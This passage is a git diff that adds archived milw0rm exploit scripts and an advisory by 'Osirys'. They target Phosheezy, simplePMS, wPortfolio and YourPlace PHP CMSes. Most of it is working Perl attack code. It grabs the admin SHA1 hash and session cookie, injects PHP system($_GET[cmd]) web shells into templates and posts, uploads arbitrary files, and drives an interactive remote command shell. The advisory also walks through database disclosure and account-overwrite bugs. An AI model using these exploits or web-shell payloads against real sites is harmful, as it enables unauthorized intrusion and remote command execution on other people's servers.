Succesfully logged in as Administrator +# [+] Template edited, RCE Vulnerability Created ! +# shell$> id +# uid=80(apache) gid=80(apache) groups=80(apache) +# shell$> exit +# [-] Quitting .. +# osirys[~]>$ +# -------------------------------------------------------------- + +use HTTP::Request; +use LWP::UserAgent; +use IO::Socket; + +my $host = $ARGV[0]; +my $pwd_path = "/config/password"; +my $adm_path = "/admin.php"; +my $templ_path = "/admin.php?action=3"; + +help("-1") unless ($host); +cheek($host) == 1 || help("-2"); +&banner; + +$datas = get_data($host); +$datas =~ /(.*) (.*)/; +($h0st,$path) = ($1,$2); + +my $url = $host.$pwd_path; +my $re = get_req($url); + +if ($re =~ /([0-9a-f]{40})/) { + $password = $1; + print "[+] Admin password found:\n"; + print " Sha1 pwd: $password \n"; + adm_log($password); +} +else { + print "[-] Unable to get sha1 Admin password\n\n"; + exit(0); +} + +sub adm_log() { + my $password = $_[0]; + my $link = $path.".".$adm_path; + my $post = "password=$password&Login=Login"; + my $length = length($post); + my @data; + my $socket = new IO::Socket::INET( + PeerAddr => $h0st, + PeerPort => '80', + Proto => 'tcp', + ) or die $!; + + my $data = "POST ".$link." HTTP/1.1\r\n". + "Host: ".$h0st."\r\n". + "Content-Type: application/x-www-form-urlencoded\r\n". + "Content-Length: ".$length."\r\n\r\n". + $post."\r\n"; + + $socket->send($data); + print "[+] Grabbing server headers to get a valid SESSION ID ..\n"; + + while (my $e = <$socket>) { + push(@data,$e); + } + foreach my $e(@data) { + if ($e =~ /Welcome to Ryneezy PhoSheezy web administration/) { + $log_ = 1; + print "[+] Succesfully logged in as Administrator\n"; + } + elsif ($e =~ /Set-Cookie: PHPSESSID=([0-9a-z]{1,50});/) { + $phpsessid = $1; + print "[+] SESSION ID grabbed: $phpsessid\n"; + } + } + + (($log_)&&($phpsessid)) || die "[-] Exploit failed -> Login Failed or SESSION ID not grabbed!\n"; + RCE_create($phpsessid); +} + +sub RCE_create() { + my $phpsessid = $_[0]; + my $link = $path.".".$templ_path; + my $code = "header=Ryneezy PhoSheezy</tit". + "le></head><body bgcolor=\"#ffffff\" text=\"#0000". + "00\">&footer=</body></html><!-- cmd --><?php sys". + "tem(\$_GET[cmd]);?><!--cmd-->&Submit=Edit Layout"; + my $length = length($code); + + my $socket = new IO::Socket::INET( + PeerAddr => $h0st, + PeerPort => '80', + Proto => 'tcp', + ) or die $!; + + my $data = "POST ".$link." HTTP/1.1\r\n". + "Host: ".$h0st."\r\n". + "Cookie: PHPSESSID=".$phpsessid."; hotlog=1\r\n". + "Content-Type: application/x-www-form-urlencoded\r\n". + "Content-Length: ".$length."\r\n\r\n". + "$code\r\n"; + + $socket->send($data); + + while (my $e = <$socket>) { + if ($e =~ /Edit layout again/) { + $rce_c = 1; + print "[+] Template edited, RCE Vulnerability Created !\n"; + } + } + + $rce_c == 1 || die "[-] Can't edit Template. Exploit failed\n\n"; + &exec_cmd; +} + +sub exec_cmd { + print "shell\$> "; + $cmd = <STDIN>; + $cmd !~ /exit/ || die "[-] Quitting ..\n"; + $exec_url = ($host."/index.php?cmd=".$cmd); + $re = get_req($exec_url); + if ($re =~ /<!-- cmd -->(.*)/) { + my $cmd = $1; + $cmd =~ s/<!--cmd-->/[-] Undefined output or bad cmd !/; + print "$cmd\n"; + &exec_cmd; + } + else { + print "[-] Undefined output or bad cmd !\n"; + &exec_cmd; + } +} + +sub get_req() { + $link = $_[0]; + my $req = HTTP::Request->new(GET => $link); + my $ua = LWP::UserAgent->new(); + $ua->timeout(4); + my $response = $ua->request($req); + return $response->content; +} + +sub cheek() { + my $host = $_[0]; + if ($host =~ /http:\/\/(.*)/) { + return 1; + } + else { + return 0; + } +} + +sub get_data() { + my $host = $_[0]; + $host =~ /http:\/\/(.*)/; + $s_host = $1; + $s_host =~ /([a-z.]{1,30})\/(.*)/; + ($h0st,$path) = ($1,$2); + $h0st !~ /www/ || $h0st =~ s/www\.//; + $path =~ s/(.*)/\/$1/; + $full_det = $h0st." ".$path; + return $full_det; +} + +sub banner { + print "\n". + " ---------------------------- \n". + " Phosheezy RCE Exploit \n". + " Coded by Osirys \n". + " ---------------------------- \n\n"; +} + +sub help() { + my $error = $_[0]; + if ($error == -1) { + &banner; + print "\n[-] Cheek that you provide a hostname address!\n"; + } + elsif ($error == -2) { + &banner; + print "\n[-] Bad hostname address !\n"; + } + print "[*] Usage : perl $0 http://hostname/cms_path\n\n"; + exit(0); +} + +# milw0rm.com [2009-01-14] \ No newline at end of file diff --git a/simplePms CMS 0.1.4 - Local File Inclusion Remote Command Execution.pl b/simplePms CMS 0.1.4 - Local File Inclusion Remote Command Execution.pl new file mode 100644 index 0000000..27d32b4 --- /dev/null +++ b/simplePms CMS 0.1.4 - Local File Inclusion Remote Command Execution.pl @@ -0,0 +1,170 @@ +#!/usr/bin/perl + +# Script : simplePMS CMS v0.1.3a +# Download: http://garr.dl.sourceforge.net/sourceforge/simplepms/simplePMS-v0-1-3prealpha.tar.bz2 +# Remote Command Execution Exploit +# Also affected to multiple LFI vulnerabilities <-- Needs Register Globals ON ($filename not declared) +# /[path]/pages/template.php?filename=[lf]%00 +# /[path]/pages/comp-template.php?filename=[lf]%00 +# by Osirys <osirys[at]autistici[dot]org> + +# Let's go into the hacking .. + +# osirys[~]>$ perl rcex.txt http://localhost/simplePMS-v0-1-3prealpha/ +# +# --------------------------------------- +# SimplePMS CMS v0.1.3a +# Remote Command Execution Sploit +# by Osirys +# --------------------------------------- +# +# [*] Adding evil post .. +# [*] Succesfully backdoored ! +# [&] Hi my master, do your job now [!] +# +# shell[localhost]$> id +# uid=80(apache) gid=80(apache) groups=80(apache) +# shell[localhost]$> pwd +# /home/osirys/web/simplePMS-v0-1-3prealpha/posts +# shell[localhost]$> exit +# [-] Quitting .. +# osirys[~]>$ + +use LWP::UserAgent; +use IO::Socket; +use HTTP::Request::Common; + +my $host = $ARGV[0]; +my $rand = int(rand 19) +1; +my $file = "h0x".$rand; + +($host) || help("-1"); +cheek($host) == 1 || help("-2"); +&banner; + +$datas = get_input($host); +$datas =~ /(.*) (.*)/; +($h0st,$path) = ($1,$2); + +my $url = $path."/post-create.php"; + +my $code = "insert=Before&filename=".$file."&topic=1337&story=owned%22%3Be". + "cho+%22p0w%22%3Bif%28get_magic_quotes_gpc%28%29%29%7B+%24_GET%". + "5Bcmd%5D%3Dstripslashes%28%24_GET%5Bcmd%5D%29%3B%7Dsystem%28%2". + "4_GET%5Bcmd%5D%29%3Becho+%22p0w%22%3B%24a+%3D+%22o&poster=owner"; + +my $length = length($code); + +my $data = "POST ".$url." HTTP/1.1\r\n". + "Host: ".$h0st."\r\n". + "Keep-Alive: 300\r\n". + "Connection: keep-alive\r\n". + "Content-Type: application/x-www-form-urlencoded\r\n". + "Content-Length: ".$length."\r\n\r\n". + $code."\r\n"; + +my $socket = new IO::Socket::INET( + PeerAddr => $h0st, + PeerPort => '80', + Proto => 'tcp', + ) or die "[-] Can't connect to $h0st:80\n[?] $! \n\n"; + +print "[*] Adding evil post ..\n"; +$socket->send($data); + +while ((my $e = <$socket>)&&($own != 1)) { + if ($e =~ /Sucessfully created post for/) { + $own = 1; + print "[*] Succesfully backdoored ! \n"; + } +} +$own == 1 || die "[-] Can't add posts !\n"; + +print "[&] Hi my master, do your job now [!]\n\n"; +&exec_cmd; + +sub exec_cmd { + my(@outs,$out); + $h0st !~ /www\./ || $h0st =~ s/www\.//; + print "shell[$h0st]\$> "; + $cmd = <STDIN>; + $cmd !~ /exit/ || die "[-] Quitting ..\n"; + $exec_url = $host."/posts/".$file."-posts.php?cmd=".$cmd; + $re = get_req($exec_url); + $content = tag($re); + if ($content =~ /p0w(.+)p0w/) { + my $out = $1; + $out =~ s/\$/ /g; + $out =~ s/\*/\n/g; + chomp($out); + print "$out\n"; + &exec_cmd; + } + else { + $c++; + $cmd =~ s/\n//; + print "bash: ".$cmd.": command not found\n"; + $c < 3 || die "[-] Command are not executed.\n[-] Something wrong. Exploit Failed !\n\n"; + } +} + +sub get_req() { + $link = $_[0]; + my $req = HTTP::Request->new(GET => $link); + my $ua = LWP::UserAgent->new(); + $ua->timeout(4); + my $response = $ua->request($req); + return $response->content; +} + +sub cheek() { + my $host = $_[0]; + if ($host =~ /http:\/\/(.*)/) { + return 1; + } + else { + return 0; + } +} + +sub get_input() { + my $host = $_[0]; + $host =~ /http:\/\/(.*)/; + $s_host = $1; + $s_host =~ /([a-z.-]{1,30})\/(.*)/; + ($h0st,$path) = ($1,$2); + $path =~ s/(.*)/\/$1/; + $full_det = $h0st." ".$path; + return $full_det; +} + +sub tag() { + my $string = $_[0]; + $string =~ s/\n/\*/g; + return($string); +} + +sub banner { + print "\n". + " --------------------------------------- \n". + " SimplePMS CMS v0.1.3a \n". + " Remote Command Execution Sploit \n". + " by Osirys \n". + " --------------------------------------- \n\n"; +} + +sub help() { + my $error = $_[0]; + if ($error == -1) { + &banner; + print "\n[-] Bad hostname! \n"; + } + elsif ($error == -2) { + &banner; + print "\n[-] Bad hostname address !\n"; + } + print "[*] Usage : perl $0 http://hostname/cms_path\n\n"; + exit(0); +} + +# milw0rm.com [2009-02-16] \ No newline at end of file diff --git a/wPortfolio 0.3 - Arbitrary File Upload.pl b/wPortfolio 0.3 - Arbitrary File Upload.pl new file mode 100644 index 0000000..c0721b2 --- /dev/null +++ b/wPortfolio 0.3 - Arbitrary File Upload.pl @@ -0,0 +1,74 @@ +#!/usr/bin/perl + +# Name: wPortfolio <= 0.3 Arbitrary File Upload Exploit +# Script Name: wPortfolio 0.3 +# Download: http://sourceforge.net/project/downloading.php?group_id=244834&use_mirror=kent&filename=wPortfolio.zip&80791070 +# Vulnerability: Arbitrary File Upload +# Vulnerable page: /admin/upload_form.php +# * You can upload everything you want, why not a php shell? ^^ +# Author: Osirys +# Contact: osirys[at]live[dot]it +# Proud to be Italian +# Thx: athos + +use LWP::UserAgent; +use HTTP::Request::Common; + +my $path = "/admin/upload_form.php"; +my $d_fold = "/admin/tmp/"; +my($host,$file) = ($ARGV[0],$ARGV[1]); + +($host,$file) || help("-1"); +cheek($host) == 1 || help("-2"); +&banner; +my $url = $host.$path; + +my $ua = LWP::UserAgent->new; +my $re = $ua->request(POST $url, + Content_Type => 'form-data', + Content => [file_to_upload => [$file]] + ); + +if ($re->is_success) { + print "[+] Uploaded ! \n"; + print "[+] Link: ".$host.$d_fold.$file." \n"; +} +else { + print "[-] Upload failed ! \n"; +} + +sub cheek() { + my $host = $_[0]; + if ($host =~ /http:\/\/(.*)/) { + return 1; + } + else { + return 0; + } +} + +sub banner { + print "\n". + " ========================================== \n". + " wPortfolio 0.3 Arbitrary File Upload \n". + " Author: Osirys \n". + " osirys[at]live[dot]it \n". + " Proud to be italian \n". + " ========================================== \n\n"; +} + +sub help() { + my $error = $_[0]; + if ($error == -1) { + &banner; + print "\n[-] Cheek that you typed the hostname address and the local file to upload !\n"; + } + elsif ($error == -2) { + &banner; + print "\n[-] Bad hostname address !\n"; + } + print "[*] Usage : perl $0 http://hostname/cms_path local_file_to_upload \n\n"; + exit(0); +} + +# milw0rm.com [2008-11-19] \ No newline at end of file diff --git a/yourplace 1.0.2 - Multiple Vulnerabilities Remote Code Execution.txt b/yourplace 1.0.2 - Multiple Vulnerabilities Remote Code Execution.txt new file mode 100644 index 0000000..c590b60 --- /dev/null +++ b/yourplace 1.0.2 - Multiple Vulnerabilities Remote Code Execution.txt @@ -0,0 +1,236 @@ +[START] + +############################################################################################################################################ +[0x01] Informations: + +Script : YourPlace 0.5 (beta 1) +Download : http://www.hotscripts.com/jump.php?listing_id=80545&jump_type=1 +Vulnerability : DB Disclosure / Arbitrary Data Saving (RCE EXPLOIT) / Arbitrary File Upload / PHPInfo Disclosure / User Change Account +Author : Osirys +Contact : osirys[at]live[dot]it +Website : http://osirys.org +Notes : Proud to be Italian +Greets: : XaDoS, x0r, emgent, Jay, str0ke, Todd and AlpHaNiX + +* This script has also other vulnerability. Here you can find just the major ones ! + I wrote a simple RCE Exploit also. + + +############################################################################################################################################ +[0x02] Bug: [Database Disclosure] +###### + +Vulnerable file is: /[path]/user/info/users.txt + +This script uses a .txt file to store usernames and passwords. + +### [!] EXPLOIT: + 1) Go at: /[path]/user/info/users.txt + 2) Get username and password ! + ex: osirys $1$H9mfzCTo$gbuasEowB1agfEqWolcGR. + username password crypted with crypt function + + +############################################################################################################################################ +[0x03] Bug: [Arbitrary Data Saving] ## RCE EXPLOIT !! +###### + +Bugged file is: /[path]/internettoolbar/edit.php + +To exploit this vulnerability, we must be logged in. + +[CODE] + + $fav5_url = $_POST['fav5_url']; + $fav1_name = $_POST['fav5_name']; + + $write = "<? \n $homepage = '".$homepage."';\n \n + $fav1_url = '".$fav1_url."';\n + $fav1_name = '".$fav1_name."';\n \n + $fav2_url = '".$fav2_url."';\n + $fav2_name = '".$fav2_name."';\n \n + $fav3_url = '".$fav3_url."';\n + $fav3_name = '".$fav3_name."';\n \n + $fav4_url = '".$fav4_url."';\n + $fav4_name = '".$fav4_name."';\n \n + $fav5_url = '".$fav5_url."';\n + $fav5_name = '".$fav5_name."';\n \n ?>"; + + $write = str_replace('$','$',$write); + $fp = fopen("../user/internettoolbar/index.php", "w+"); + $fw = fwrite($fp, $write); + +[/CODE] + +All the $fav variables come from POST. There is any cheek on what the user put in the form of $fav vars. +Then the script will save the value of this vars in /[path]/user/internettoolbar/index.php. +So we can put an evil php code ;) +I wrote a simple exploit, a simple proof of concept, change it in your own way ;) +This exploit can be adapted to your own needs. + +############################################################ +########################################## +## Remote Command Execution Perl Exploit + +[code] + +#!/usr/bin/perl + +use HTTP::Request; +use LWP::UserAgent; + +my $path = "/internettoolbar/edit.php"; +my $exec_path = "/user/internettoolbar/index.php"; +my $c0de = "lol.it';?><?php system(\$_GET['cmd']);'"; +my $host = $ARGV[0]; + + +($host) || help("-1"); +cheek($host) == 1 || help("-2"); +&banner; + +print "[+] Connecting to $host ..\n"; +print "[+] Writing hell php code ..\n"; + +my $url = $host.$path; + +my $ua = LWP::UserAgent->new; +my $post = $ua->post($url, + [ + fav1_url => $c0de, + do => submit + ]); + +if ($post->is_success) { + print "[+] Commands:\n"; + print " exit -> quit the exploit \n"; + print " your command -> exec your cmd \n"; + &exec_cmd; +} +else { + print "[-] Can't write hell code !\n"; + exit(0); +} + +sub exec_cmd { + print "shell[Osirys]$>\n"; + $cmd = <STDIN>; + $cmd !~ /exit/ || die "[-] Quitting ..\n"; + $exec_url = ($host.$exec_path."?cmd=".$cmd); + $re = query($exec_url); + if ($re =~ /\?>(.*)/) { + print "[*] $1\n"; + &exec_cmd; + } + else { + print "[-] Undefined output or bad cmd !\n"; + &exec_cmd; + } +} + +sub query() { + $link = $_[0]; + my $req = HTTP::Request->new(GET => $link); + my $ua = LWP::UserAgent->new(); + $ua->timeout(4); + my $response = $ua->request($req); + return $response->content; +} + +sub cheek() { + my $host = $_[0]; + if ($host =~ /http:\/\/(.*)/) { + return 1; + } + else { + return 0; + } +} + +sub banner { + print "\n". + " ============================ \n". + " YourPlace RCE Exploit \n". + " Coded by Osirys \n". + " osirys[at]live[dot]it \n". + " Proud to be italian \n". + " ============================ \n\n"; +} + +sub help() { + my $error = $_[0]; + if ($error == -1) { + &banner; + print "\n[-] Cheek that you typed the hostname address and the command to execute !\n"; + } + elsif ($error == -2) { + &banner; + print "\n[-] Bad hostname address !\n"; + } + print "[*] Usage : perl $0 http://hostname/cms_path\n\n"; + exit(0); +} + +[/CODE] + + +############################################################################################################################################ +[0x04] Bug: [Arbitrary File Upload] +###### + +Bugged file is: /[path]/apps/standard/upload.php + +To upload our local file we must be logged in. Then we can upload any file. +The bug here is to allow user to upload file of any extensions, in fact there isn't any extension cheek. + + +### [!] EXPLOIT: + 1) Go at: /[path]/apps/standard/upload.php + 2) Upload your local file. + 3) Cheek it here: /[path]/user/uploads/your_file.your_ext + + +############################################################################################################################################ +[0x05] Bug: [PHPInfo Disclosure] +###### + +Vulnerable file is: /[path]/user/uploads/phpinfo.php + + +### [!] EXPLOIT: + 1) Go at /[path]/user/uploads/phpinfo.php + 2) Get php information + + +############################################################################################################################################ +[0x06] Bug: [User Change Account] +###### + +Bugged file is: /[path]/login/register.php + +[CODE] + +if (isset ($_POST['submit'])) { + $fp = fopen ( '../user/info/users.txt', 'w+' ); + + if ($fp){ + $data = $_POST['username']."\t".crypt($_POST['password'])."\r\n"; + fwrite ( $fp, $data ); + fclose ( $fp ); + echo ":-)"; + } + +[/CODE] + +Registering a new user, the old one will be deleted. + + +### [!] EXPLOIT: Go at: /[path]/login/register_form.php + Register your new user + + +############################################################################################################################################ + +[/END] + +# milw0rm.com [2008-12-22] \ No newline at end of file